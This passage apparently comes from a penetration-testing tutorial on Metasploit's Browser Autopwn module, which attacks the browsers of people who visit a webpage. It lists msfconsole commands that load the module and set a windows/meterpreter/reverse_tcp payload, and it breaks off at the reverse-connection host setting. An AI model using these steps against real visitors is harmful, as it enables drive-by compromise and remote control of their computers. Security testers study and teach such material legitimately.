Browser Autopwn is an auxiliary module provided by Metasploit that allows you to automate an attack on a victim machine simply when they access a webpage. Browser Autopwn performs a fingerprint of the client before it attacks; meaning that it will not try a Mozilla Firefox exploit against an Internet Explorer 7 browser. Based upon its determination of browser, it decides which exploit is the best to deploy.
Let's begin by opening a terminal window:
Open a terminal window.
Launch the MSFCONSOLE:
msfconsole
Search for the
autopwn
modules:Search autopwn
Use the
browser_autopwn
module:Use auxiliary/server/browser_autopwn
Set our payload. In this case we use Windows Reverse TCP:
set payload windows/meterpreter/reverse_tcp
Show the options for this type of payload:
show options
Set the host IP address where the reverse connection will be made. In this case...